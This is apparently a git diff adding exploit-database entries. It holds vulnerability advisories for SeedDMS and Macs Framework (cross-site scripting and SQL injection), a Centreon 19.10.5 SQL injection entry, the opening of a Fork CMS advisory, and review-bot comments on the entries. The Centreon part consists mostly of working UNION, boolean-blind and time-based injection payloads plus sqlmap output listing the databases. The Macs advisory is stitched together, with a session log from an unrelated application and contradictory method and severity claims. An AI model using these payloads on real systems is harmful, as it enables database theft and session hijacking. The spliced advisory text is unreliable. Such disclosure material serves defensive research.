documents. It's +fully compatible with its predecessor LetoDMS. + +(Copy of the Homepage: https://www.seeddms.org/index.php?id=2 & +https://www.seeddms.org/index.php?id=7 ) + + +Abstract Advisory Information: +============================== +The vulnerability laboratory core research team discovered multiple +persistent vulnerabilities in the SeedDMS v5.1.16 & v5.1.18 web-application. 
+ + +Affected Product(s): +==================== +Uwe Steinmann +Product: SeedDMS - Content Management System v4.3.37, v5.0.13, v5.1.14, +v5.1.16, v5.1.18 and v6.0.7 + + +Vulnerability Disclosure Timeline: +================================== +2020-04-15: Public Disclosure (Vulnerability Laboratory) + + +Discovery Status: +================= +Published + + +Exploitation Technique: +======================= +Remote + + +Severity Level: +=============== +Medium + + +Authentication Type: +==================== +Restricted authentication (user/moderator) - User privileges + + +User Interaction: +================= +Low User Interaction + + +Disclosure Type: +================ +Independent Security Research + + +Technical Details & Description: +================================ +Multiple persistent cross site web vulnerabilities has been discovered +in the SeedDMS v4.3.37, v5.0.13, v5.1.14 and v6.0.7 web-application. +The vulnerability allows remote attackers to inject own malicious script +codes with persistent attack vector to compromise browser to +web-application requests from the application-side. + +The persistent cross site scripting web vulnerabilities are located in +the `name` and `comment` parameter of the `AddEvent.php` file. +Remote attackers are able to add an own event via op.AddEvent with +malicious script codes. The request method to inject is POST +and the attack vector is located on the application-side. After the +inject the execution occurs in the admin panel within the +`Log Management` - `Webdav` and `Web` on view. The content of the +comment and name is unescaped pushed inside of the logs with +a html/js template. Thus allows an attacker to remotly exploit the issue +by a simple post inject from outside with lower privileges. 
+ +Successful exploitation of the vulnerability results in session +hijacking, persistent phishing attacks, persistent external redirects +to malicious source and persistent manipulation of affected or connected +application modules. + +Request Method(s): +[+] POST + +Vulnerable Module(s): +[+] op.AddEvent (AddEvent.php) + +Vulnerable Parameter(s): +[+] name +[+] comment + +Affected Module(s): +[+] Log Management (out.LogManagement.php) + + +Proof of Concept (PoC): +======================= +The persistent web vulnerability can be exploited by remote attackers +with low privileged web-application user account and low user interaction. +For security demonstration or to reproduce the security web +vulnerability follow the provided information and steps below to continue. + + +Manual steps to reproduce the vulnerability ... +1. Start your local webbrowser and tamper the http protocol session +2. Open the AddEvent.php and add a new event +3. Insert your script code test payload inside the Name or Comments path +4. Save or submit the entry with error +Note: Now the web and webdav log has captured the insert or erro +5. Now wait until the administrator previews in the log management the +web or webdav view function +6. Successful reproduce of the persistent web vulnerability! + + +PoC: Vulnerable Source (Log Management - View) +
Apr 13 19:23:22  [info] admin (localhost) op.RemoveLog
+?logname=20200413.log
+Apr 13 19:29:53  [info] admin (localhost) op.AddEvent ?name="
+&comment=&from=1586728800&to=1586815199
+
+ + +PoC: Payload +>" + + +--- PoC Session Logs (POST) --- +https://SeedDMS.localhost:8080/out/out.AddEvent.php +Host: SeedDMS.localhost:8080 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) +Gecko/20100101 Firefox/75.0 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate, br +Connection: keep-alive +Referer: https://SeedDMS.localhost:8080/out/out.Calendar.php?mode=y +Cookie: mydms_session=b0496ccee96aa571a3ca486b8738c312 +- +GET: HTTP/1.1 200 OK +Server: Apache/2.4.25 (Debian) +Vary: Accept-Encoding +Content-Encoding: gzip +Content-Length: 2973 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +- +https://SeedDMS.localhost:8080/op/op.AddEvent.php +Host: SeedDMS.localhost:8080 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) +Gecko/20100101 Firefox/75.0 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate, br +Content-Type: application/x-www-form-urlencoded +Content-Length: 356 +Origin: https://SeedDMS.localhost:8080 +Connection: keep-alive +Referer: https://SeedDMS.localhost:8080/out/out.AddEvent.php +Cookie: mydms_session=b0496ccee96aa571a3ca486b8738c312 +from=2020-04-13&to=2020-04-13 +&name=>"&comment=>" +- +POST: HTTP/1.1 302 Found +Server: Apache/2.4.25 (Debian) +Location: ../out/out.Calendar.php?mode=w&day=13&year=2020&month=04 +Content-Length: 0 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 + +Note: Injection Point via Calender op.AddEvent Name & Comment + + + +--- PoC Session Logs (GET) --- +https://SeedDMS.localhost:8080/out/out.LogManagement.php?logname=20200413.log +Host: SeedDMS.localhost:8080 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) +Gecko/20100101 Firefox/75.0 +Accept: text/html, */*; q=0.01 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, 
deflate, br +X-Requested-With: XMLHttpRequest +Connection: keep-alive +Referer: https://SeedDMS.localhost:8080/out/out.LogManagement.php +Cookie: mydms_session=b0496ccee96aa571a3ca486b8738c312 +- +GET: HTTP/1.1 200 OK +Server: Apache/2.4.25 (Debian) +Vary: Accept-Encoding +Content-Encoding: gzip +Content-Length: 273 +Keep-Alive: timeout=5, max=94 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 +- +https://SeedDMS.localhost:8080/out/evil.source +Host: SeedDMS.localhost:8080 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) +Gecko/20100101 Firefox/75.0 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate, br +Connection: keep-alive +Referer: https://SeedDMS.localhost:8080/out/out.LogManagement.php +Cookie: mydms_session=b0496ccee96aa571a3ca486b8738c312 +Upgrade-Insecure-Requests: 1 +- +GET: HTTP/1.1 302 Found +Server: Apache/2.4.25 (Debian) +Location: /out/out.ViewFolder.php +Content-Length: 0 +Keep-Alive: timeout=5, max=93 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 + +Note: Execution Point via Log Management (AP) on Webdav View or Web View + + + +Reference(s): +https://SeedDMS.localhost:8080/ +https://SeedDMS.localhost:8080/op/op.AddEvent.php +https://SeedDMS.localhost:8080/out/out.ViewFolder.php +https://SeedDMS.localhost:8080/out/out.AddEvent.php +https://SeedDMS.localhost:8080/out/out.LogManagement.php +https://SeedDMS.localhost:8080/out/out.Calendar.php?mode= +https://SeedDMS.localhost:8080/out/out.LogManagement.php?logname= + + +Solution - Fix & Patch: +======================= +1. Parse and escape the name and comment input field on transmit to sanitize +2. Filter and restrict the input field of the name and comments +parameter for special chars to prevent injects +3. 
Parse the output location of all web and webdav logfiles to prevent +the execution point + + +Security Risk: +============== +The security risk of the persistent cross site web vulnerabilities in +the seeddms web-application are estimated as medium. + + +Credits & Authors: +================== +Vulnerability-Lab - +https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab +Benjamin Kunz Mejri - +https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M. + + +Disclaimer & Information: +========================= +The information provided in this advisory is provided as it is without +any warranty. Vulnerability Lab disclaims all warranties, +either expressed or implied, including the warranties of merchantability +and capability for a particular purpose. Vulnerability-Lab +or its suppliers are not liable in any case of damage, including direct, +indirect, incidental, consequential loss of business profits +or special damages, even if Vulnerability-Lab or its suppliers have been +advised of the possibility of such damages. Some states do +not allow the exclusion or limitation of liability for consequential or +incidental damages so the foregoing limitation may not apply. +We do not approve or encourage anybody to break any licenses, policies, +deface websites, hack into databases or trade with stolen data. 
+ +Domains: www.vulnerability-lab.com www.vuln-lab.com +www.vulnerability-db.com +Services: magazine.vulnerability-lab.com +paste.vulnerability-db.com infosec.vulnerability-db.com +Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab +youtube.com/user/vulnerability0lab +Feeds: vulnerability-lab.com/rss/rss.php +vulnerability-lab.com/rss/rss_upcoming.php +vulnerability-lab.com/rss/rss_news.php +Programs: vulnerability-lab.com/submit.php +vulnerability-lab.com/register.php +vulnerability-lab.com/list-of-bug-bounty-programs.php + +Any modified copy or reproduction, including partially usages, of this +file requires authorization from Vulnerability Laboratory. +Permission to electronically redistribute this alert in its unmodified +form is granted. All other rights, including the use of other +media, are reserved by Vulnerability-Lab Research Team or its suppliers. +All pictures, texts, advisories, source code, videos and other +information on this website is trademark of vulnerability-lab team & the +specific authors or managers. To record, list, modify, use or +edit our material contact (admin@ or research@) to get a ask permission. + + Copyright © 2020 | Vulnerability Laboratory - [Evolution +Security GmbH]™ + + + + +-- +VULNERABILITY LABORATORY - RESEARCH TEAM \ No newline at end of file diff --git a/exploits/php/webapps/48325.txt b/exploits/php/webapps/48325.txt new file mode 100644 index 000000000..0cb46c90a --- /dev/null +++ b/exploits/php/webapps/48325.txt 
@@ -0,0 +1,482 @@
+# Title: Macs Framework 1.14f CMS - Persistent Cross-Site Scripting
+# Author: Vulnerability Laboratory
+# Date: 2020-04-15
+# Software Link: https://sourceforge.net/projects/macs-framework/files/latest/download
+# CVE: N/A
+
+Document Title:
+===============
+Macs Framework v1.14f CMS - Multiple Web Vulnerabilities
+
+
+References (Source):
+====================
+https://www.vulnerability-lab.com/get_content.php?id=2206
+
+
+Release Date:
+=============
+2020-04-14
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+2206
+
+
+Common Vulnerability Scoring System:
+====================================
+7.4
+
+
+Vulnerability Class:
+====================
+Multiple
+
+
+Current Estimated Price:
+========================
+1.000€ - 2.000€
+
+
+Product & Service Introduction:
+===============================
+Macs CMS is a Flat File (XML and SQLite) based AJAX Content Management
+System. It focuses mainly on the
+Edit In Place editing concept. It comes with a built in blog with
+moderation support, user manager section,
+roles manager section, SEO / SEF URL.
+https://sourceforge.net/projects/macs-framework/files/latest/download
+
+(Copy of the Homepage: https://sourceforge.net/projects/macs-framework/ )
+
+
+Abstract Advisory Information:
+==============================
+The vulnerability laboratory core research team discovered multiple web
+vulnerabilities in the official Macs Framework v1.1.4f CMS.
+
+
+Affected Product(s):
+====================
+Macrob7
+Product: Macs Framework v1.14f - Content Management System
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2020-04-14: Public Disclosure (Vulnerability Laboratory)
+
+
+Discovery Status:
+=================
+Published
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+Severity Level:
+===============
+High
+
+
+Authentication Type:
+====================
+Restricted authentication (user/moderator) - User privileges
+
+
+User Interaction:
+=================
+Low User Interaction
+
+
+Disclosure Type:
+================
+Independent Security Research
+
+
+Technical Details & Description:
+================================
+1.1 & 1.2
+Multiple non-persistent cross site scripting web vulnerabilities has
+been discovered in the official Mac Framework v1.1.4f Content Managament
+System.
+The vulnerability allows remote attackers to manipulate client-side
+browser to web-applicatio requests to compromise user sesson credentials
+or to
+manipulate module content.
+
+The first vulnerability is located in the search input field of the
+search module. Remote attackers are able to inject own malicious script
+code as
+search entry to execute the code within the results page that is loaded
+shortly after the request is performed. The request method to inject is
+POST
+and the attack vector is located on the client-side with non-persistent
+attack vector.
+
+The second vulnerability is located in the email input field of the
+account reset function. Remote attackers are able to inject own
+malicious script code as
+email to reset the passwort to execute the code within performed
+request. The request method to inject is POST and the attack vector is
+located on the
+client-side with non-persistent attack vector.
+
+Successful exploitation of the vulnerabilities results in session
+hijacking, non-persistent phishing attacks, non-persistent external
+redirects to
+malicious source and non-persistent manipulation of affected or
+connected application modules.
+
+Request Method(s):
+[+] POST
+
+Vulnerable Parameter(s):
+[+] searchString
+[+] emailAdress
+
+
+1.3
+Multiple remote sql-injection web vulnerabilities has been discovered in
+the official Mac Framework v1.1.4f Content Managament System.
+The vulnerability allows remote attackers to inject or execute own sql
+commands to compromise the dbms or file system of the application.
+
+The sql injection vulnerabilities are located in the `roleId` and
+`userId` of the `editRole` and `deletUser` module. The request method to
+inject or execute commands is GET and the attack vector is located on
+the application-side. Attackers with privileged accounts to edit are
+able to inject own sql queries via roleid and userid on deleteUser or
+editRole. Multiple unhandled and broken sql queries are visible as default
+debug to output for users as well.
+
+Exploitation of the remote sql injection vulnerability requires no user
+interaction and a privileged web-application user account.
+Successful exploitation of the remote sql injection results in database
+management system, web-server and web-application compromise.
+
+Request Method(s):
+[+] POST
+
+Vulnerable Module(s):
+[+] deleteUser
+[+] editRole
+
+Vulnerable Parameter(s):
+[+] userId
+[+] roleId
+
+
+Proof of Concept (PoC):
+=======================
+Google Dork(s): intitle, subtitle & co.
+Site Powered by Mac's PHP MVC Framework Framework of the future
+Design downloaded from Zeroweb.org: Free website templates, layouts, and
+tools.
+
+
+1.1
+The non-persistent cross site scripting web vulnerability can be
+exploited by remote attackers without user account and with low user
+interaction.
+For security demonstration or to reproduce the cross site scripting web +vulnerability follow the provided information and steps below to continue. + + +PoC: Payload +>">" + + + + +--- PoC Session Logs [POST] --- +https://macs-cms.localhost:8080/index.php/main/cms/forgotPassword +Host: macs-cms.localhost:8080 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) +Gecko/20100101 Firefox/75.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate, br +Content-Type: application/x-www-form-urlencoded +X-Requested-With: XMLHttpRequest +Content-Length: 17 +Origin: https://macs-cms.localhost:8080 +Connection: keep-alive +Referer: https://macs-cms.localhost:8080/index.php/main/cms/login +Cookie: PHPSESSID=h81eeq4jucus8p9qp146pjn652; +ajaxRequest=true +- +POST: HTTP/1.1 200 OK +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, +pre-check=0 +Pragma: no-cache +Content-Type: text/html; charset=ISO-8859-1 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Server: Microsoft-IIS/8.5 +X-Powered-By: ASP.NET +X-Powered-By-Plesk: PleskWin +Content-Length: 335 +- +https://macs-cms.localhost:8080/index.php/main/cms/forgotPasswordProcess +Host: macs-cms.localhost:8080 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) +Gecko/20100101 Firefox/75.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate, br +Content-Type: application/x-www-form-urlencoded +X-Requested-With: XMLHttpRequest +Content-Length: 123 +Origin: https://macs-cms.localhost:8080 +Connection: keep-alive +Referer: https://macs-cms.localhost:8080/index.php/main/cms/login +Cookie: PHPSESSID=h81eeq4jucus8p9qp146pjn652; +ajaxRequest=true&=&emailAddress=test" + + + +PoC: Payload +" + + +--- PoC Session Logs [POST] --- +http://localhost:89/taoQtiTest/Creator/saveTest?uri=http%3A%2F%2Flocalhost%2Ftao.rdf%23i1586971961942612 +Host: localhost:89 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) +Gecko/20100101 Firefox/75.0 +Accept: 
application/json, text/javascript, */*; q=0.01 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Content-Length: 9664 +Origin: http://localhost:89 +Connection: keep-alive +Referer: +http://localhost:89/tao/Main/index?structure=tests&ext=taoTests§ion=authoring +Cookie: tao_X3GLb7Ke=i89lfik72ts13i8soadgfb64hb; +tao_f46245c=9ebdee0d0f34b349a61ba23443ecc950c43a0042 +model={"qti-type":"assessmentTest","identifier":"Test-1","title":"QTI +Example Test","toolName":"tao","toolVersion":"2.7","outcomeDeclarations":[], +"timeLimits":{"qti-type":"timeLimits","maxTime":7810,"allowLateSubmission":false},"testParts":[{"qti-type":"testPart","identifier":"Introduction","navigationMode":1,"submissionMode":0,"preConditions":[],"branchRules":[], +"itemSessionControl":{"qti-type":"itemSessionControl","maxAttempts":0,"showFeedback":false,"allowReview":true,"showSolution":false,"allowComment":false, +"validateResponses":false,"allowSkipping":true},"assessmentSections":[{"qti-type":"assessmentSection","title":"Section +1","visible":true, +"keepTogether":true,"sectionParts":[{"qti-type":"assessmentItemRef","href":"http://localhost/tao.rdf#i1586971963337314","categories":[], +"variableMappings":[],"weights":[],"templateDefaults":[],"identifier":"item-1","required":false,"fixed":false,"preConditions":[],"branchRules":[],"index":0, +"itemSessionControl"{"qtitype":"itemSessionControl","maxAttempts":1,"showFeedback":false,"allowReview":true,"showSolution":false,"allowComment":true, +"validateResponses":false,"allowSkipping":true},"isLinear":false}],"identifier":"assessmentSection-1","required":true,"fixed":false,"preConditions":[],"branchRules":[], +"itemSessionControl":{"qti-type":"itemSessionControl","maxAttempts":1,"showFeedback":false,"allowReview":true,"showSolution":false,"allowComment":true,"validateResponses": 
+false,"allowSkipping":true},"index":0}],"testFeedbacks":[],"index":0},{"qti-type":"testPart","identifier":"QTIExamples","navigationMode":0,"submissionMode":0,"preConditions":[],"branchRules":[],"assessmentSections":[{"qti-type":"assessmentSection","title":"Section +1","visible":false,"keepTogether":true,"sectionParts":[{"qti-type":"assessmentItemRef","href":"http://localhost/tao.rdf#i1586971964187315","categories":[],"variableMappings":[],"weights":[],"templateDefaults":[],"identifier":"item-2","required":false,"fixed":false,"preConditions":[],"branchRules":[],"index":0,"itemSessionControl":{"qti-type":"itemSessionControl","maxAttempts":1,"showFeedback":false,"allowComment":false,"allowSkipping":true,"validateResponses":false},"isLinear":true, +"timeLimits":{"maxTime":0,"minTime":0,"allowLateSubmission":false,"qti-type":"timeLimits"}},{"qti-type":"assessmentItemRef", +"href":"http://localhost/tao.rdf#i1586971965925016","categories":[],"variableMappings":[],"weights":[],"templateDefaults":[],"identifier":"item-3","required":false,"fixed":false,"preConditions":[],"branchRules":[],"index":1,"itemSessionControl":{"qti-type":"itemSessionControl"},"isLinear":true}, +{"qti-type":"assessmentItemRef","href":"http://localhost/tao.rdf#i158697196662817","categories":[],"variableMappings":[],"weights":[], +"templateDefaults":[],"identifier":"item-4","required":false,"fixed":false,"preConditions":[],"branchRules":[],"index":2,"itemSessionControl +":{"qti-type":"itemSessionControl"},"isLinear":true},{"qti-type":"assessmentItemRef","href":"http://localhost/tao.rdf#i1586971967539318","categories" +:[],"variableMappings":[],"weights":[],"templateDefaults":[],"identifier":"item-5","required":false,"fixed":false,"preConditions":[],"branchRules":[], +"index":3,"itemSessionControl":{"qti-type":"itemSessionControl"},"isLinear":true},{"qti-type":"assessmentItemRef","href": 
+"http://localhost/tao.rdf#i1586971968508019","categories":[],"variableMappings":[],"weights":[],"templateDefaults":[],"identifier":"item-6", +"required":false,"fixed":false,"preConditions":[],"branchRules":[],"index":4,"itemSessionControl":{"qti-type":"itemSessionControl"},"isLinear":true},{"qti-type":"assessmentItemRef","href":"http://localhost/tao.rdf#i1586971969922220","categories":[],"variableMappings":[],"weights":[],"templateDefaults":[],"identifier": +"item-7","required":false,"fixed":false,"preConditions":[],"branchRules":[],"index":5,"itemSessionControl":{"qti-type":"itemSessionControl"},"isLinear":true},{"qti-type":"assessmentItemRef","href":"http://localhost/tao.rdf#i158697197087021","categories":[],"variableMappings":[],"weights":[],"templateDefaults":[],"identifier":"item-8","required":false,"fixed":false,"preConditions":[],"branchRules":[],"index":6,"itemSessionControl":{"qti-type":"itemSessionControl"},"isLinear":true},{"qti-type":"assessmentItemRef","href":"http://localhost/tao.rdf#i1586971970668622","categories":[],"variableMappings":[],"weights":[],"templateDefaults":[],"identifier": +"item-9","required":false,"fixed":false,"preConditions":[],"branchRules":[],"index":7,"itemSessionControl":{"qti-type":"itemSessionControl"},"isLinear":true}],"identifier":"assessmentSection-2","required":false,"fixed":false,"preConditions":[],"branchRules":[],"index":0, +"itemSessionControl":{"qti-type":"itemSessionControl"},"rubricBlocks":[{"qti-type":"rubricBlock","index":0,"content":[{"qti-type":"div","id":"","class":"","xmlBase":"","lang":"","label":"","content":[{"qti-type":"textRun","content":"asd>"", +"xmlBase":""}]}],"views":["candidate"],"orderIndex":1,"uid":"rb1","feedback":{"activated":false,"outcome":null,"matchValue":null,"qti-type":"feedback"}, +"class":""}]}],"testFeedbacks":[],"index":1}],"testFeedbacks":[],"scoring":{"modes":{"none":{"key":"none","label":"None","description":"No +outcome processing. 
+Erase the existing rules, if +any.","qti-type":"none"},"custom":{"key":"custom","label":"Custom","description":"bufu","qti-type":"cut"},"qti-type":"modes"},"scoreIdentifier":"SCORE","weightIdentifier":"","cutScore":0.5,"categoryScore":false,"outcomeProcessing":"none","qti-type":"scoring"}} +- +POST: HTTP/1.1 200 OK +Server: Apache/2.4.38 (Win32) PHP/7.2.15 +X-Powered-By: PHP/7.2.15 +Cache-Control: no-store, no-cache, must-revalidate +Pragma: no-cache +Content-Security-Policy: frame-ancestors 'self' +Content-Length: 14 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: application/json; charset=UTF-8 +- +http://localhost:89/tao/Main/evil.source +Host: localhost:89 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) +Gecko/20100101 Firefox/75.0 +Accept: image/webp,*/* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: keep-alive +Referer: +http://localhost:89/tao/Main/index?structure=tests&ext=taoTests§ion=authoring +Cookie: tao_X3GLb7Ke=i89lfik72ts13i8soadgfb64hb; +tao_f46245c=9ebdee0d0f34b349a61ba23443ecc950c43a0042 +- +GET: HTTP/1.1 200 OK +Server: Apache/2.4.38 (Win32) PHP/7.2.15 +X-Powered-By: PHP/7.2.15 +Cache-Control: no-store, no-cache, must-revalidate +Pragma: no-cache +Content-Length: 169 +Keep-Alive: timeout=5, max=99 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 + + +Security Risk: +============== +1.1 +The security risk of the html inject web vulnerability in the +web-application is estimated as medium. + +1.2 +The security risk of the persistent cross site scripting web +vulnerability in the web-application is estimated as medium. + + +Credits & Authors: +================== +Vulnerability-Lab - +https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab +Benjamin Kunz Mejri - +https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M. 
+
+
+Disclaimer & Information:
+=========================
+The information provided in this advisory is provided as it is without
+any warranty. Vulnerability Lab disclaims all warranties,
+either expressed or implied, including the warranties of merchantability
+and capability for a particular purpose. Vulnerability-Lab
+or its suppliers are not liable in any case of damage, including direct,
+indirect, incidental, consequential loss of business profits
+or special damages, even if Vulnerability-Lab or its suppliers have been
+advised of the possibility of such damages. Some states do
+not allow the exclusion or limitation of liability for consequential or
+incidental damages so the foregoing limitation may not apply.
+We do not approve or encourage anybody to break any licenses, policies,
+deface websites, hack into databases or trade with stolen data.
+
+Domains: www.vulnerability-lab.com www.vuln-lab.com
+www.vulnerability-db.com
+Services: magazine.vulnerability-lab.com
+paste.vulnerability-db.com infosec.vulnerability-db.com
+Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab
+youtube.com/user/vulnerability0lab
+Feeds: vulnerability-lab.com/rss/rss.php
+vulnerability-lab.com/rss/rss_upcoming.php
+vulnerability-lab.com/rss/rss_news.php
+Programs: vulnerability-lab.com/submit.php
+vulnerability-lab.com/register.php
+vulnerability-lab.com/list-of-bug-bounty-programs.php
+
+Any modified copy or reproduction, including partially usages, of this
+file requires authorization from Vulnerability Laboratory.
+Permission to electronically redistribute this alert in its unmodified
+form is granted. All other rights, including the use of other
+media, are reserved by Vulnerability-Lab Research Team or its suppliers.
+All pictures, texts, advisories, source code, videos and other
+information on this website is trademark of vulnerability-lab team & the
+specific authors or managers. To record, list, modify, use or
+edit our material contact (admin@ or research@) to get a ask permission.
+
+ Copyright © 2020 | Vulnerability Laboratory - [Evolution
+Security GmbH]™
+
+
+
+--
+VULNERABILITY LABORATORY - RESEARCH TEAM
\ No newline at end of file
diff --git a/exploits/php/webapps/48345.txt b/exploits/php/webapps/48345.txt
new file mode 100644
index 000000000..6a9c7ba07
--- /dev/null
+++ b/exploits/php/webapps/48345.txt
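Review bot: The proof-of-concept section does not demonstrate what the advisory claims: the only Macs request shown is `forgotPasswordProcess` with the `emailAddress` payload stripped, and the second session log (`/taoQtiTest/Creator/saveTest` on `localhost:89`, `tao_*` cookies, Apache/PHP 7.2 banner) is from a different application than the IIS/Plesk host in the first log, so it appears to have been pasted in from another report. No request at all is given for the `roleId`/`userId` SQL injection in `editRole`/`deleteUser`, and section 1.3 says the injection method is GET in the prose but lists `[+] POST` under Request Method(s), which should read `[+] GET` if the prose is right. The header `Persistent Cross-Site Scripting` and the Security Risk entries ("html inject", "persistent cross site scripting") also contradict the body, which describes only non-persistent XSS (1.1, 1.2) and SQL injection (1.3). Before this entry is accepted the misplaced TAO log should be removed and one concrete request per claimed issue added, so a reader can tell which parameter, module and authentication level each finding actually needs.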
@@ -0,0 +1,69 @@
+# Exploit Title: Centreon 19.10.5 - 'id' SQL Injection
+# Date: 2020-04-19
+# Exploit Author: Basim alabdullah
+# Vendor Homepage: https://www.centreon.com
+# Software Link: https://download.centreon.com/
+# Version: v.19.10.5
+# Tested on: Centos 5
+
+
+[EXECUTIVE SUMMARY]
+
+ Centreon has come a long way from its early roots. A user-friendly monitoring console on Nagios before, Centreon is today, a rich monitoring platform powered by Centreon Engine, Centreon Broker and Centreon Web.
+
+ Monitoring-savvy IT practitioners who want Nagios-inspired flexibility without its complexity, easily embrace Centreon for robust infrastructure systems and network performance monitoring.
+ Downloaded by hundreds and thousands of IT professionals worldwide.
+ The analysis discovered a time-based blind SQL
+ injection vulnerability in the tracker functionality of
+ Centreon Monitoring software. A malicious user can inject arbitrary
+ SQL commands to the application. The vulnerability lies in the project tracker
+ service search functionality; depending on project visibility successful
+ exploitation may require user authentication. A successful attack
+ can read, modify or delete data from the database or execute arbitrary commands on the underlying system.
+
+[VULNERABLE VERSIONS]
+
+ The following version of the Centreon Monitoring was affected by the
+ vulnerability; previous versions may be vulnerable as well:
+ - Centreon version 19.10.5
+
+
+[Proof of Concept]
+
+ http://TARGET/centreon/include/monitoring/acknowlegement/xml/broker/makeXMLForAck.php?hid=15&svc_id=1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCONCAT%280x7176706b71%2C%28CASE%20WHEN%20%28ISNULL%28JSON_STORAGE_FREE%28NULL%29%29%29%20THEN%201%20ELSE%200%20END%29%2C0x716b716b71%29%2CNULL%2CNULL%23
+
+
+ [Payloads]
+
+ Parameter: svc_id (GET)
+ Type: boolean-based blind
+ Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
+ Payload: hid=15&svc_id=1 OR NOT 5782=5782
+
+ Type: time-based blind
+ Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
+ Payload: hid=15&svc_id=1 AND (SELECT 1615 FROM (SELECT(SLEEP(5)))TRPy)
+
+ Type: UNION query
+ Title: MySQL UNION query (NULL) - 5 columns
+ Payload: hid=15&svc_id=1 UNION ALL SELECT NULL,NULL,CONCAT(0x7176706b71,0x724b66756a476759544f48716d61496b5a68754a4c6f42634e6e775272724c44616e567355527a6f,0x716b716b71),NULL,NULL#
+---
+[12:24:35] [INFO] testing MySQL
+[12:24:35] [INFO] confirming MySQL
+[12:24:35] [INFO] the back-end DBMS is MySQL
+[12:24:35] [INFO] fetching banner
+web server operating system: Linux Red Hat
+web application technology: Apache 2.4.34, PHP 7.2.24
+back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)
+banner: '10.1.38-MariaDB'
+[12:24:35] [INFO] fetching database names
+[12:24:35] [INFO] starting 4 threads
+[12:24:35] [INFO] resumed: 'centreon'
+[12:24:35] [INFO] resumed: 'test'
+[12:24:35] [INFO] resumed: 'centreon_storage'
+[12:24:35] [INFO] resumed: 'information_schema'
+available databases [4]:
+[*] centreon
+[*] centreon_storage
+[*] information_schema
+[*] test
\ No newline at end of file
diff --git a/exploits/php/webapps/48348.txt b/exploits/php/webapps/48348.txt
new file mode 100644
index 000000000..64d991ee6
--- /dev/null
+++ b/exploits/php/webapps/48348.txt
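Review bot: The title names the injected parameter as `'id'`, but every payload in the file targets `svc_id` of `include/monitoring/acknowlegement/xml/broker/makeXMLForAck.php` (with `hid` as the companion parameter), so the header should read `# Exploit Title: Centreon 19.10.5 - 'svc_id' SQL Injection`. The executive summary looks reused from an unrelated advisory: it refers to "project tracker service search functionality" and "project visibility", neither of which applies to Centreon's acknowledgement XML endpoint, and it leaves the one precondition a reader needs unstated — whether the request must carry an authenticated Centreon session cookie should be said explicitly, because the sqlmap output gives no hint either way. The sentence that a successful attack can "execute arbitrary commands on the underlying system" is not supported by anything shown; the PoC only enumerates databases, so it should be narrowed to what the boolean, time-based and UNION payloads demonstrate (read access to `centreon`, `centreon_storage` and friends) unless a file-write or command path is actually shown. `# Tested on: Centos 5` is also doubtful next to the fingerprint `Apache 2.4.34, PHP 7.2.24`, which CentOS 5 never shipped — presumably a newer distribution was used and the line should say so.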
@@ -0,0 +1,491 @@
+# Title: Fork CMS 5.8.0 - Persistent Cross-Site Scripting
+# Author: Vulnerability Laboratory
+# Date: 2020-04-15
+# Vendor: https://www.fork-cms.com/download
+# Software Link: https://github.com/forkcms/forkcms/pull/3073
+# CVE: N/A
+
+Document Title:
+===============
+Fork CMS v5.8.0 - Multiple Persistent Web Vulnerbilities
+
+
+References (Source):
+====================
+https://www.vulnerability-lab.com/get_content.php?id=2208
+
+ID (3073): https://github.com/forkcms/forkcms/pull/3073
+
+
+Release Date:
+=============
+2020-04-17
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+2208
+
+
+Common Vulnerability Scoring System:
+====================================
+5.3
+
+
+Vulnerability Class:
+====================
+Cross Site Scripting - Persistent
+
+
+Current Estimated Price:
+========================
+1.000€ - 2.000€
+
+
+Product & Service Introduction:
+===============================
+Fork is an easy to use open source CMS using Symfony Components. Fork
+CMS is dedicated to creating a user friendly environment
+to build, monitor and
+update your website. We take great pride in being the Content Management
+System of choice for beginners and professionals.
+
